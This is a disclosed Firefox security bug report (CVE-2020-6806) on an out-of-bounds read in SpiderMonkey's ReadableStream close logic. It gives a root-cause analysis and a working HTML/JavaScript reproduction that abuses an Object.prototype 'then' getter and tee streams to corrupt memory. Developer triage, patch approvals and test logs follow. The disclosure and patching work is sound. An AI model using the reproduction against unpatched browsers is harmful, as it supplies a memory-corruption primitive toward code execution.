Closed Bug 1612308 (CVE-2020-6806) Opened 9 months ago Closed 8 months ago

Security: OOB access in js::ReadableStreamCloseInternal

Categories

(Core :: DOM: Networking, defect, P1)

defect

Tracking

()

RESOLVED FIXED
mozilla75
Tracking Status
firefox-esr68 74+ fixed
firefox72 --- wontfix
firefox73 --- wontfix
firefox74 + fixed
firefox75 + fixed

People

(Reporter: glazunov, Assigned: Waldo)

References

()

Details

(Keywords: sec-high, Whiteboard: [disclosure date is 2020-04-29][post-critsmash-triage][adv-main74+][adv-esr68.6+], [wptsync upstream])

Attachments

(8 files, 3 obsolete files)

Attached file crash.log

VULNERABILITY DETAILS
js/src/builtin/streams/ReadableStreamInternals.cpp:175:

MOZ_MUST_USE bool js::ReadableStreamCloseInternal(
    JSContext* cx, Handle<ReadableStream*> unwrappedStream) {
  // Step 1: Assert: stream.[[state]] is "readable".
  MOZ_ASSERT(unwrappedStream->readable());

  // Step 2: Set stream.[[state]] to "closed".
  unwrappedStream->setClosed(); // *** 1 ***

  // Step 4: If reader is undefined, return (reordered).
  if (!unwrappedStream->hasReader()) {
    return true;
  }

  // Step 3: Let reader be stream.[[reader]].
  Rooted<ReadableStreamReader*> unwrappedReader(
      cx, UnwrapReaderFromStream(cx, unwrappedStream));
  if (!unwrappedReader) {
    return false;
  }

  // Step 5: If ! IsReadableStreamDefaultReader(reader) is true,
  if (unwrappedReader->is<ReadableStreamDefaultReader>()) {
    ForAuthorCodeBool forAuthorCode = unwrappedReader->forAuthorCode();

    // Step a: Repeat for each readRequest that is an element of
    //         reader.[[readRequests]],
    Rooted<ListObject*> unwrappedReadRequests(cx, unwrappedReader->requests());
    uint32_t len = unwrappedReadRequests->length(); // *** 2 ***
    Rooted<JSObject*> readRequest(cx);
    Rooted<JSObject*> resultObj(cx);
    Rooted<Value> resultVal(cx);
    for (uint32_t i = 0; i < len; i++) { // *** 3 ***
      // Step i: Resolve readRequest.[[promise]] with
      //         ! ReadableStreamCreateReadResult(undefined, true,
      //                                          readRequest.[[forAuthorCode]]).
      readRequest = &unwrappedReadRequests->getAs<JSObject>(i); // *** 4 ***
      if (!cx->compartment()->wrap(cx, &readRequest)) {
        return false;
      }

      resultObj = js::ReadableStreamCreateReadResult(cx, UndefinedHandleValue,
                                                     true, forAuthorCode);
      if (!resultObj) {
        return false;
      }
      resultVal = ObjectValue(*resultObj);
      if (!ResolvePromise(cx, readRequest, resultVal)) { // *** 5 ***
        return false;
      }
    }

    // Step b: Set reader.[[readRequests]] to an empty List.
    unwrappedReader->clearRequests();
  }

  // Step 6: Resolve reader.[[closedPromise]] with undefined.
  if (!ResolveUnwrappedPromiseWithUndefined(cx,
                                            unwrappedReader->closedPromise())) {
    return false;
  }

  if (unwrappedStream->mode() == JS::ReadableStreamMode::ExternalSource) {
    // Make sure we're in the stream's compartment.
    AutoRealm ar(cx, unwrappedStream);
    JS::ReadableStreamUnderlyingSource* source =
        unwrappedStream->controller()->externalSource();
    source->onClosed(cx, unwrappedStream); // *** 6 ***
  }

  return true;
}

js/src/builtin/streams/ReadableStreamOperations.cpp:187:

static bool TeeReaderReadHandler(JSContext* cx, unsigned argc, Value* vp) {
[...]
  // Step 12.c.ix: If canceled1 is false, perform
  //               ? ReadableStreamDefaultControllerEnqueue(
  //                     branch1.[[readableStreamController]], value1).
  if (!unwrappedTeeState->canceled1()) { // *** 7 ***
    unwrappedController = unwrappedTeeState->branch1();
    if (!ReadableStreamDefaultControllerEnqueue(cx, unwrappedController,
                                                value1)) {
      return false;
    }
  }
[...]
}

The ECMAScript specification requires the promise resolution algorithm to synchronously access the
then property of the resolution object. Therefore, when a user defines a corresponding accessor on
Object.prototype, a majority of calls to ResolvePromise become observable to user JavaScript
code.

ReadableStreamCloseInternal fails to take that into account. The function doesn't check whether
the length of the request container[2] remains unchanged after a call to ResolvePromise[5] and
uses the original length as the loop exit condition[3]. If an attacker shrinks the container from
inside the promise resolution, getAs[4] will access out-of-bounds data during the next iteration.

The code sets the stream's state to closed[1] before iterating through the requests, and most
methods that modify the container check that the stream is in the readable state first. However,
the tee algorithm employs its own set of flags to track the state of the child streams[7]. These
flags only get updated after the loop has ended[6], so TeeReaderReadHandler will pass all the
checks even when it's called from inside ResolvePromise.

The only remaining obstacle is that TeeReaderReadHandler is attached to a promise reaction and is
supposed to always run asynchronously. Therefore, the attacker has to figure out how to
synchronously trigger promise reactions. Roughly speaking, reactions get executed when the last
active nsAutoMicroTask object is destroyed. The main challenge here is to run JavaScript outside
the nsAutoMicroTask scope. Conventional means of running JS like event handlers, setTimeout and
<script> elements won't work as they always instantiate a new nsAutoMicroTask. Instead, the
attacker can reuse the then accessor technique and execute JavaScript, for example, during
resolution of a promise created by the Fetch API. The stack trace in this case looks as follows:

CallGetter
GetExistingProperty
NativeGetPropertyInline
js::NativeGetProperty
js::GetProperty
js::GetProperty
js::GetProperty
ResolvePromiseInternal
js::PromiseObject::resolve
ResolveOrRejectPromise
js::ReadableStreamFulfillReadOrReadIntoRequest
JS::ReadableStreamUpdateDataAvailableFromSource
mozilla::dom::BodyStream::OnInputStreamReady
nsInputStreamReadyEvent::Run

All that's left then is to create and immediately destroy an nsAutoMicroTask object at the right
time, which is trivial.

VERSION
Firefox 72.0.2
Firefox 74.0a1 (changeset fc5cbea8d173)

REPRODUCTION CASE

<body>
<script>
performMicrotaskCheckpoint = () => {
  document.createNodeIterator(document, -1, {
    acceptNode() {
      return NodeFilter.FILTER_ACCEPT;
  } }).nextNode();
}

runOutsideMicrotasksScope = func => {
  fetch(location).then(response => {
    stream = response.body;
    Object.prototype.__defineGetter__('then', () => {
      delete Object.prototype.then;

      func();
    });
    reader = stream.getReader();
    reader.read();
  });
}

runOutsideMicrotasksScope(() => {
  let stream = new ReadableStream({ start(ctr) { controller = ctr } });
  let tee_streams = stream.tee();
  let reader = tee_streams[0].getReader();
  reader.read();
  reader.read();

  Object.prototype.__defineGetter__('then', () => {
    delete Object.prototype.then;

    controller.enqueue('foo');
    performMicrotaskCheckpoint();
  });
  reader.cancel();
});
</script>
</body>

CREDIT INFORMATION
Sergei Glazunov of Google Project Zero

This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report will
become visible to the public. The scheduled disclosure date is 2020-04-29. Disclosure at an earlier
date is also possible if agreed upon by all parties.

Attached file repro.html
Group: firefox-core-security → javascript-core-security
Component: Security → JavaScript Engine
Product: Firefox → Core

I can approximately comprehend many of the words in comment 0, but my understanding of microtasks and exactly how they are specified to work is...not good enough to understand the details roughly once nsAutoMicroTask gets mentioned. I may need to drag in a DOM expert or so to make progress through this, and to figure out what the right way to address it is, exactly.

CCing suspects for investigation, since I barely understand the JS half of this and I emphatically do not understand the DOM or nsAutoMicroTask portion of this; will try to poke people to see if we can walk through this in-person in Berlin today, too.

So I managed to find Olli at lunch...then as I was eating nearby he disappeared and I lost track of him. Let's go to needinfo, at least til I can find him in person. I have an hour and a half til the next place I have to be, if something possibly can be fit in in that time...

I briefly described/discussed this with annevk as well a few minutes ago, and he was wondering if we were just flat-out missing an nsAutoMicroTask somewhere -- because it ought not be possible for the ResolvePromise to induce a synchronous resolution that way. This seems at least possible to me, based on my meager knowledge of promises and the DOM side of them, but I definitely don't have the knowledge to evaluate the claim and have any confidence in my evaluation.

Flags: needinfo?(bugs)

So looking at this over IRL, we think there's definitely a missing nsAutoMicroTask in mozilla::dom::BodyStream::OnInputStreamReady or so -- a microtask missed because it wasn't recognized that the JSAPI function called there could cause script to run. :-|

Once that's set aside, tho, it seems like it ought be fragile to loop over indexes in the read requests array this way. But, it really shouldn't be -- that array shouldn't be being touched by any code other than this, when the stream is already marked as closed. It feels to me like we should 1) change the relevant steps of ReadableStreamCloseInternal so that we extract the requests array (implicitly clearing the stored array) before we process it (now as sole owner of it), which requires 2) figuring out who else is "simultaneously" accessing-and-mutating that array and making them stop. It looks like the simultaneous access is supposed to only be possible with a spec bug -- maybe? -- but I'm building a browser now to see if I'm misreading things (very possible). Once we do that, tho, there would not be a possibility of multiple places in code modifying this array at the same time, and it would then be safe and normal to loop element-by-element as we do now.

IRL I wondered if just replacing then() with something which modifies the stream internals is enough to trigger this.

Flags: needinfo?(bugs)

Running the testcase in a debug build will fail the assertion at the end of this snippet:

MOZ_MUST_USE bool js::ReadableStreamDefaultControllerEnqueue(
    JSContext* cx, Handle<ReadableStreamDefaultController*> unwrappedController,
    Handle<Value> chunk) {
  AssertSameCompartment(cx, chunk);

  // Step 1: Let stream be controller.[[controlledReadableStream]].
  Rooted<ReadableStream*> unwrappedStream(cx, unwrappedController->stream());

  // Step 2: Assert:
  //      ! ReadableStreamDefaultControllerCanCloseOrEnqueue(controller) is
  //      true.
  MOZ_ASSERT(!unwrappedController->closeRequested());
  MOZ_ASSERT(unwrappedStream->readable());

The ReadableStream tee code can call this function, on a controller for a stream that does not satisfy step 2 -- which associated spec prose indicates is a precondition. So possibly the ReadableStream tee code should be checking not just !canceled1, but also can-close-or-enqueue, before doing its thing. (This appears to be the only place that can touch this array -- so if we fix this, we can extract out the array and operate on it as a local, as suggested in comment 5.)

OK, so a few things:

  1. Given that ReadableStreamUpdateDataAvailableFromSource can run script, BodyStream::OnInputStreamReady should absolutely have an AutoEntryScript, not an AutoJSAPI.

  2. AutoEntryScript is spec-visible, in the sense that it can trigger promise reactions when it comes off the stack. Specs should generally have corresponding bits involving manipulating the script context stack and doing microtask checkpoints (e.g. see "prepare to run a script" or "prepare to run a callback" in the HTML spec, and their corresponding cleanup algorithms). Sounds like the streams spec needs to do something like that, if it's introducing script entry points....

Status: UNCONFIRMED → NEW
Ever confirmed: true
Priority: -- → P1

So, missing AutoEntryScript is apparently really terrible. Could we at least make it not security-terrible, by making JS::ResolvePromise or whatever the underlying-est primitive is, check that we're always inside some sort of whatever-it-is-AutoEntryScript enacts (and probably crash if we aren't)? Doesn't solve the missing-an-entry problem and identifying all such places, but at least it means missing something isn't bad.

Flags: needinfo?(bzbarsky)
Assignee: nobody → jwalden
Status: NEW → ASSIGNED

So I may be doing something terribly wrong somehow, but if I write that patch without the explicit nsAutoMicroTask mt;, AutoEntryScript does not actually seem to defer microtask resolution, and the assertion/crash are still possible. For comparison, script execution has in sequence an nsAutoMicroTask mt; followed by an AutoEntryScript:

https://searchfox.org/mozilla-central/source/dom/script/ScriptLoader.cpp#2710

If I really shouldn't need the nsAutoMicroTask mt; there, it seems like something else would need changing for that. Right?

(I'm approximately science-dogging away here, so if it looks like I have no idea what I'm doing there's a good reason for that...)

Another possibility, besides (in addition to?) crashing in resolve/reject-promise internals if there's no microtask queue pending, would be to check/assert/crash in nsAutoMicroTask if there are any pending promise jobs to reject/resolve when the constructor call happens (and the constructor call isn't a nested nsAutoMicroTask).

Attachment #9123657 - Attachment mime type: text/x-log → text/plain
Attachment #9123658 - Attachment mime type: application/octet-stream → text/html
Keywords: sec-high
Whiteboard: [disclosure date is 2020-04-29]

[Tracking Requested - why for this release]: sec-high with 2020-04-29 disclosure date. I'm not sure exactly what releases we want to track for this.

So, missing AutoEntryScript is apparently really terrible.

Apparently.... I wonder whether we could do an nsAutoMicrotask in AutoJSAPI without causing visible spec violations.

by making JS::ResolvePromise or whatever the underlying-est primitive is, check that we're always inside some sort of
whatever-it-is-AutoEntryScript enacts (and probably crash if we aren't)?

The underlying-est primitives are whatever can run script.

We have basically two options, not necessarily mutually exclusive. One is to do check-and-crash at the actual script entry points. So for example in js::InternalCallOrConstruct or some such, if we push things down as much as we can to make sure we're definitely catching all the cases that would definitely enter script. This has the benefit of good coverage of the really-dangerous cases and the drawback of bad coverage of callsites that only sometimes call script (e.g. the "then" getter involved in this case!). The second option is to put these checks at higher-level entrypoints. ResolvePromise is a bit too high-level; it makes more sense to put it in GetProperty somewhere, since ResolvePromise always calls GetProperty, right?

As far as what the check should be checking... there isn't anything specific right now to check, unfortunately. We could add something, but doing it fast would be an issue, unless we stored it on the JSContext itself or something like that.

Bobby may have some thoughts too; I thought he'd planned on this sort of enforcement initially with AutoEntryScript.

AutoEntryScript does not actually seem to defer microtask resolution

Ugh. I was sure that AutoEntryScript had an AutoMicroTask inside, but apparently not? Looks like CallSetup does separate microtask management as well.

I think that's pretty unexpected and we should definitely have an AutoMicroTask as part of AutoEntryScript, though some consumers that want to defer the microtask checkpoint until later than ~AutoEntryScript might need a separate AutoMicroTask anyway.

Flags: needinfo?(bzbarsky)
Flags: needinfo?(bugs)
Flags: needinfo?(bholley)

I think that's pretty unexpected and we should definitely have an AutoMicroTask as part of AutoEntryScript

We'd need to audit consumers, sadly, to make sure we don't coalesce microtasks across too much stuff. For example, CustomElementReactionsStack::InvokeReactions will sometimes have an AES live across all the reactions (!), which would probably give the wrong microtask semantics...

The good news is we only have about 50 uses of AutoEntryScript. The bad news is that I expect most are broken wrt microtasks; we should be able to write tests for this...

So bug 1181740 was sort of about removing the cases when we have "nsAutoMicroTask but not AES". The discussion above is removing cases when we have "AES but not nsAutoMicroTask"...

(In reply to Boris Zbarsky [:bzbarsky, bz on IRC] from comment #14)

The underlying-est primitives are whatever can run script.

We have basically two options, not necessarily mutually exclusive. One is to do check-and-crash at the actual script entry points. So for example in js::InternalCallOrConstruct or some such, if we push things down as much as we can to make sure we're definitely catching all the cases that would definitely enter script. This has the benefit of good coverage of the really-dangerous cases and the drawback of bad coverage of callsites that only sometimes call script (e.g. the "then" getter involved in this case!). The second option is to put these checks at higher-level entrypoints. ResolvePromise is a bit too high-level; it makes more sense to put it in GetProperty somewhere, since ResolvePromise always calls GetProperty, right?

As far as what the check should be checking... there isn't anything specific right now to check, unfortunately. We could add something, but doing it fast would be an issue, unless we stored it on the JSContext itself or something like that.

I'm sure I don't understand the constraints enough, but at least within this bug's tunnel-vision I am worrying solely about promise resolution happening unexpectedly early. And so ResolvePromise (or maybe ResolvePromiseInternal) is the underlying-est primitive to target that particular gang-aft-agley scenario. And promise resolving/rejecting is a drawn-out slow process that could tolerate one more check.

If things go awry for other stuff like GetProperty or any function call at all, those are probably not code paths that could support a check of this every time they happen...I would think. We'd need better can-run-script attributing or something else for that.

but at least within this bug's tunnel-vision I am worrying solely about promise resolution happening unexpectedly early

Ah. I was worried about script running without an AES on the stack, which is also a bad thing that we need to prevent.

(In reply to Boris Zbarsky [:bzbarsky, bz on IRC] from comment #14)

Bobby may have some thoughts too; I thought he'd planned on this sort of enforcement initially with AutoEntryScript.

We have bug 1108262 on file for that, at least. I think we discussed this a few times over the years, but never acted on it. Would certainly be worth making this whole situation less foot-gun-y.

Ugh. I was sure that AutoEntryScript had an AutoMicroTask inside, but apparently not?

I originally wanted to do this, but IIRC you and/or smaug insisted that the spec required otherwise. I have a few IRC logs from that era I could dig up if that's helpful.

Flags: needinfo?(bholley)

but IIRC you and/or smaug insisted that the spec required otherwise

I don't think it would have been me, because I am pretty sure I did not pretend to understand microtasks back then.

The really big question is whether all the places where we have AutoEntryScript correspond to the spec pushing things on the JavaScript context stack... Really whether they correspond to https://html.spec.whatwg.org/#prepare-to-run-script and https://html.spec.whatwg.org/#clean-up-after-running-script -- the former basically does a thing that means "no microtasks will run" and the latter will run microtasks if it's the outermost script execution.

Depends on D61478

(I got guilted into writing the automated test I should have written and posted already, by the security-approval/branch-landing form. Sue me. :-) Who knows when we can land it...but at least it's there to land when the time comes.)

So in the course of writing minimal testcases (before wrangling them into wpt shape), I happened to write this testcase. Obviously it fails without this patch...but it fails this assertion

    // The WriteInto callback changes mState to eChecking.
    MOZ_ASSERT_IF(ok, mState == eChecking);

immediately after JS::ReadableStreamUpdateDataAvailableFromSource finishes.

Moreover, it fails that assertion even with this patch in place.

This probably is just because alert means nested event queues or other insanity along those lines, but I don't know. The assert here is in BodyStream.cpp, so it could be a problem with BodyStream.cpp. Maybe this assertion assumes the invisibility/un-alterability of the update-data-available action, that is belied by this stupid "then" interposition mandated by promises?

Is there an additional problem here, worth a separate bug, that is not just "alert is known to be terrible"? And if there is one, how ought I go about filing a bug on it in a way that doesn't inadvertently reveal the existence of this bug?

Attachment #9125293 - Flags: feedback?(bzbarsky)
Comment on attachment 9125293 [details]
Maybe another bug I found?

> This probably is just because alert means nested event queues or other insanity along those lines, but I don't know

That seems possible, but this code still needs to deal with it....

I really don't know the streams code that well; redirecting to Andrea.
Flags: needinfo?(amarchesini)
Attachment #9125293 - Flags: feedback?(bzbarsky)
Flags: needinfo?(amarchesini)

Waldo, do you mind to ask for a security-approval and land my patch with yours? Thanks.

Flags: needinfo?(jwalden)
Attachment #9125754 - Attachment description: Bug 1612308 - Remove an wrong assertion in BodyStream, r?bzbarsky → Bug 1612308 - Remove a wrong assertion in BodyStream, r?bzbarsky
Attachment #9125754 - Attachment description: Bug 1612308 - Remove a wrong assertion in BodyStream, r?bzbarsky → Bug 1612308 - Add a comment to BodyStream explaining why an expected state can't be asserted in a particular place. r=bzbarsky

Will do.

Given this is security and all, I'm a bit paranoid about just adding explanatory comments, so I moved the removal of the assertion into my patch, commandeered your revision (hopefully without changing author, or at least the revision I submitted with moz-phab had you set as author) and made it add the comment, then submitted those with the test on top of them.

I'm still floundering my way through the spec idioms some, so I'm going to go for approvals and not hold that up for whatever spec changes may be needed here.

Flags: needinfo?(jwalden)

Comment on attachment 9124087 [details]
Bug 1612308. r=bzbarsky

Security Approval Request

  • How easily could an exploit be constructed based on the patch?: Someone who understands the precise ramifications of a missing microtask queue setup probably can attack the absence of this patch pretty easily.

If they're doing the trick that was done here -- abuse streams code that presumes promises are never fulfilled synchronously -- the failure mode is accessing off the end of (what can be made to be) a heap allocation, then interpreting that data as a JSObject*, then using it as if it were valid. It's probably not entirely easy, but if you have that much rope I expect a capable attacker probably can get to arbitrary code execution.

If they're doing some other trick, that abuses the absence of an AutoEntryScript, I do not understand the ramifications of this enough to say what the bad things that can happen are. Except that apparently they are Bad.

  • Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?: No
  • Which older supported branches are affected by this flaw?: Goes back to at least esr68, so of them
  • If not all supported branches, which bug introduced the flaw?: None
  • Do you have backports for the affected branches?: No
  • If not, how different, hard to create, and risky will they be?: The patch applies cleanly to beta.

ESR68 has this code in dom/fetch/FetchStream.cpp, but it's pretty easy to make the necessary changes. I've made them locally, will post that patch in a sec.

  • How likely is this patch to cause regressions; how much testing does it need?: It's a pretty straightforward patch, unlikely to cause regressions. Definitely on the safer side, but probably not entirely absolutely safe.
Attachment #9124087 - Flags: sec-approval?
Attached patch ESR backport (obsolete) — Splinter Review

[Approval Request Comment]
If this is not a sec:{high,crit} bug, please state case for ESR consideration: Probably high/critical.
User impact if declined: Bad Stuff, see previous comment.
Fix Landed on Version: Hopefully landing this version?
Risk to taking this patch (and alternatives if risky): Ain't got no choice.

Attachment #9127393 - Flags: approval-mozilla-esr68?

(In reply to Bobby Holley (:bholley) from comment #19)

I originally wanted to do this, but IIRC you and/or smaug insisted that the spec required otherwise. I have a few IRC logs from that era I could dig up if that's helpful.

It would have caused us trigger microtask checkpoint when entering chrome JS.

Flags: needinfo?(bugs)

Comment on attachment 9124087 [details]
Bug 1612308. r=bzbarsky

Beta/Release Uplift Approval Request

  • User impact if declined: See previous comments.
  • Is this code covered by automated tests?: No
  • Has the fix been verified in Nightly?: No
  • Needs manual test from QE?: No
  • If yes, steps to reproduce:
  • List of other uplifts needed: None
  • Risk to taking this patch: Low
  • Why is the change risky/not risky? (and alternatives if risky): Pretty straightforward to add script entrypoint/microtask handling here, changes are pretty understandable. The changes have a variety of interesting implications that are not drop-dead simple, so if I had the option I'd probably rate it somewhere between low and medium. But I don't, and the change couldn't be any smaller, and AutoEntryScript and nsAutoMicroTask are both widely used so are generously exercised, so it seems to shade a bit closer to low than to medium.
  • String changes made/needed:
Attachment #9124087 - Flags: approval-mozilla-beta?

It would have caused us trigger microtask checkpoint when entering chrome JS.

Only when there's no content JS on the stack already, right? I guess that could still be an issue if there are places which effectively post a microtask while not in the scope of an nsAutoMicrotask, whether in our impl or in the spec?

Comment on attachment 9124087 [details]
Bug 1612308. r=bzbarsky

Approved to land

Attachment #9124087 - Flags: sec-approval?
Attachment #9124087 - Flags: sec-approval+
Attachment #9124087 - Flags: approval-mozilla-beta?
Attachment #9124087 - Flags: approval-mozilla-beta+
Attachment #9127393 - Flags: approval-mozilla-esr68? → approval-mozilla-esr68+

Push with failure: https://treeherder.mozilla.org/#/jobs?repo=autoland&resultStatus=testfailed%2Cbusted%2Cexception&revision=602a074ca5a5b301cadad4e2005ff33008b3927f
Failure log: https://treeherder.mozilla.org/logviewer.html#?job_id=290480240&repo=autoland

[task 2020-02-26T02:34:16.210Z] 02:34:16 INFO - TEST-START | /fetch/api/basic/stream-response.any.html
[task 2020-02-26T02:34:16.210Z] 02:34:16 INFO - Closing window 199
[task 2020-02-26T02:35:11.208Z] 02:35:11 INFO - Got timeout in harness
[task 2020-02-26T02:35:11.551Z] 02:35:11 INFO - TEST-UNEXPECTED-TIMEOUT | /fetch/api/basic/stream-response.any.html | TestRunner hit external timeout (this may indicate a hang)
[task 2020-02-26T02:35:11.551Z] 02:35:11 INFO - TEST-INFO took 55343ms
[task 2020-02-26T02:35:12.781Z] 02:35:12 INFO - Browser not responding, setting status to CRASH
[task 2020-02-26T02:35:12.781Z] 02:35:12 WARNING - Command left in command_queue during cleanup: 'test_ended', (<wptrunner.wpttest.TestharnessTest /fetch/api/basic/stream-response.any.html>, (<wptrunner.wpttest.TestharnessResult CRASH>, []))
[task 2020-02-26T02:35:12.782Z] 02:35:12 INFO - Closing logging queue
[task 2020-02-26T02:35:12.782Z] 02:35:12 INFO - queue closed
[task 2020-02-26T02:35:12.797Z] 02:35:12 INFO - Setting up ssl
[task 2020-02-26T02:35:12.914Z] 02:35:12 INFO - certutil |
[task 2020-02-26T02:35:12.989Z] 02:35:12 INFO - certutil |
[task 2020-02-26T02:35:13.010Z] 02:35:13 INFO - certutil |
[task 2020-02-26T02:35:13.010Z] 02:35:13 INFO - Certificate Nickname Trust Attributes
[task 2020-02-26T02:35:13.010Z] 02:35:13 INFO - SSL,S/MIME,JAR/XPI
[task 2020-02-26T02:35:13.010Z] 02:35:13 INFO -
[task 2020-02-26T02:35:13.010Z] 02:35:13 INFO - web-platform-tests CT,,
[task 2020-02-26T02:35:13.010Z] 02:35:13 INFO -
[task 2020-02-26T02:35:15.883Z] 02:35:15 INFO - adb Granting important runtime permissions to org.mozilla.geckoview.test
[task 2020-02-26T02:35:17.680Z] 02:35:17 INFO - adb launch_application: am start -W -n org.mozilla.geckoview.test/org.mozilla.geckoview.test.TestRunnerActivity -a android.intent.action.MAIN --es env9 MOZ_DISABLE_NONLOCAL_CONNECTIONS=1 --es env8 R_LOG_DESTINATION=stderr --es args "-no-remote -profile /sdcard/tests/profile --marionette about:blank" --es env3 MOZ_HIDE_RESULTS_TABLE=1 --es env2 R_LOG_VERBOSE=1 --es env1 MOZ_WEBRENDER=0 --es env0 MOZ_CRASHREPORTER=1 --es env7 MOZ_CRASHREPORTER_SHUTDOWN=1 --es env6 MOZ_IN_AUTOMATION=1 --es env5 MOZ_LOG=signaling:3,mtransport:4,DataChannel:4,jsep:4 --es env4 STYLO_THREADS=1 --ez use_multiprocess True --es env12 R_LOG_LEVEL=6 --es env11 MOZ_PROCESS_LOG=/tmp/tmpbyLhkVpidlog --es env10 MOZ_CRASHREPORTER_NO_REPORT=1
[task 2020-02-26T02:35:19.560Z] 02:35:19 INFO - Starting runner
[task 2020-02-26T02:35:19.746Z] 02:35:19 INFO - TEST-START | /fetch/api/basic/stream-response.any.worker.html
[task 2020-02-26T02:35:19.783Z] 02:35:19 INFO - Setting pref javascript.options.streams (true)
[task 2020-02-26T02:36:00.000Z] 02:36:00 INFO -
[task 2020-02-26T02:36:00.000Z] 02:36:00 INFO - TEST-UNEXPECTED-TIMEOUT | /fetch/api/basic/stream-response.any.worker.html | Stream response's body - Test timed out
[task 2020-02-26T02:36:00.350Z] 02:36:00 INFO - TEST-UNEXPECTED-TIMEOUT | /fetch/api/basic/stream-response.any.worker.html | expected OK

Flags: needinfo?(jwalden)

...okay, need to look harder at this:

 1:53.08 TEST_START: /fetch/api/basic/stream-response.any.html
 1:54.15 INFO Setting pref javascript.options.streams (true)
 1:56.31 pid:4209 [rr 4668 264454][Child 4668, Main Thread] WARNING: NS_ENSURE_TRUE(mPresShell) failed: file /home/jwalden/moz/after/layout/base/nsPresContext.cpp, line 847
 2:03.47 pid:4209 [rr 4541 286315][Child 4541, Main Thread] WARNING: Trying to request nsIHttpChannel from DocumentChannel, this is likely broken: file /home/jwalden/moz/after/netwerk/ipc/DocumentChannel.cpp, line 64
 2:07.86 pid:4209 [rr 4668 299262][Child 4668, Main Thread] WARNING: Trying to request nsIHttpChannel from DocumentChannel, this is likely broken: file /home/jwalden/moz/after/netwerk/ipc/DocumentChannel.cpp, line 64
 2:13.10 pid:4209 [rr 4668 315356]###!!! ERROR: Potential deadlock detected:
 2:13.10 pid:4209 [rr 4668 315359]=== Cyclical dependency starts at
 2:13.10 pid:4209 [rr 4668 315361]--- Mutex : BodyStream::mMutex[rr 4668 315363] (currently acquired)
 2:13.10 pid:4209 [rr 4668 315365] calling context
 2:13.10 pid:4209 [rr 4668 315367]  [stack trace unavailable]
 2:13.10 pid:4209 [rr 4668 315369]
 2:13.10 pid:4209 === Cycle completed at
 2:13.10 pid:4209 [rr 4668 315371]--- Mutex : BodyStream::mMutex[rr 4668 315373] (currently acquired)
 2:13.10 pid:4209 [rr 4668 315375] calling context
 2:13.10 pid:4209 [rr 4668 315377]  [stack trace unavailable]
 2:13.10 pid:4209 [rr 4668 315379]
 2:13.10 pid:4209 ###!!! Deadlock may happen NOW!
 2:13.10 pid:4209 [rr 4668 315383][rr 4668 315385][Child 4668, Main Thread] ###!!! ASSERTION: Potential deadlock detected:
 2:13.10 pid:4209 Cyclical dependency starts at
 2:13.10 pid:4209 Mutex : BodyStream::mMutex (currently acquired)
 2:13.10 pid:4209 Cycle completed at
 2:13.10 pid:4209 Mutex : BodyStream::mMutex (currently acquired)
 2:13.11 pid:4209 ###!!! Deadlock may happen NOW!
 2:13.11 pid:4209 : 'Error', file /home/jwalden/moz/after/xpcom/threads/BlockingResourceBase.cpp, line 248
 2:13.11 pid:4209 [rr 4668 315387]mozilla::detail::MutexImpl::mutexLock: pthread_mutex_lock failed: Resource deadlock avoided
 2:13.11 pid:4209 [rr 4668 315389]Hit MOZ_CRASH(mozilla::detail::MutexImpl::mutexLock: pthread_mutex_lock failed) at /home/jwalden/moz/after/mozglue/misc/Mutex_posix.cpp:127
 2:13.11 pid:4209 [rr 4668 315399]UndefinedBehaviorSanitizer[rr 4668 315401]:DEADLYSIGNAL
 2:13.11 pid:4209 [rr 4668 315405][rr 4668 315409]==4668==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x000000000001 (pc 0x55c660de1736 bp 0x7ffccb421060 sp 0x7ffccb421050 T4668)
 2:13.11 pid:4209 [rr 4668 315412][rr 4668 315415]==4668==The signal is caused by a WRITE memory access.
 2:13.11 pid:4209 [rr 4668 315419]==4668==Hint: address points to the zero page.

Evidently just AES/nsAutoMicroTask-ing is mutex-unhappymaking. How to fix, how to fix...

Flags: needinfo?(jwalden)

https://treeherder.mozilla.org/#/jobs?repo=try&revision=94d29ab1716fbb117144016b4ca1daa771965312 potentially is a solution. (Already landed and was backed out once, cat's out of the bag more or less, time to go to try...)

Well that was dumb, can't use MutexAutoUnlock which is RAII to affect a previously-declared thing that is also RAII. Time for some wonderfully terrible Maybe<MutexAutoLock>. 😬 Try churns away...again.

https://treeherder.mozilla.org/#/jobs?repo=try&revision=2f8884dd54934c29186a38fd43f47df907b4733c

Group: javascript-core-security → core-security-release
Status: ASSIGNED → RESOLVED
Closed: 8 months ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla75

I probably should have clarified -- not just as a comment on the trunk-targeted phabricator rev -- that the esr68 patch has not been updated with the amendments to the trunk patch. (This system where we have two separate places to record progress, here and phabricator, is such garbage. :-( )

Flags: needinfo?(jwalden)
Attached file Bug 1612308. r=bzbarsky (obsolete) —
Attachment #9129980 - Attachment is obsolete: true
Attachment #9127393 - Attachment is obsolete: true
Flags: qe-verify-
Whiteboard: [disclosure date is 2020-04-29] → [disclosure date is 2020-04-29][post-critsmash-triage]

Beefed up the comment-adding patch with comments relating to why Maybe<MutexAutoLock> is desirable/necessary. Still need to get to making any spec changes to do microtask handling/etc. properly.

Whiteboard: [disclosure date is 2020-04-29][post-critsmash-triage] → [disclosure date is 2020-04-29][post-critsmash-triage][adv-main74+][adv-esr68.6+]
Attached file advisory.txt (obsolete) —

Okay this one was pretty tough to write an advisory for. Suggestions welcome.

Well this is interesting. It appears this problem affected more browser engines than just us:

https://github.com/whatwg/streams/pull/1029

That looks like the hackaround workaround I initially thought was needed here, but really the problem was with our DOM code not deferring the processing. I'll keep poking there and see if we can't get the root cause fixed in whatever the relevant spec is.

Component: JavaScript Engine → DOM: Networking
Group: core-security-release
Pushed by jwalden@mit.edu:
https://hg.mozilla.org/integration/autoland/rev/6b32769bb661
Add a comment to BodyStream explaining why an expected state can't be asserted in a particular place.  r=bzbarsky
https://hg.mozilla.org/integration/autoland/rev/42b8c852164d
Add a test.  r=bzbarsky
Created web-platform-tests PR https://github.com/web-platform-tests/wpt/pull/24707 for changes under testing/web-platform/tests
Whiteboard: [disclosure date is 2020-04-29][post-critsmash-triage][adv-main74+][adv-esr68.6+] → [disclosure date is 2020-04-29][post-critsmash-triage][adv-main74+][adv-esr68.6+], [wptsync upstream]
Flags: in-testsuite+
Upstream PR merged by jgraham
You need to log in before you can comment on or make changes to this bug.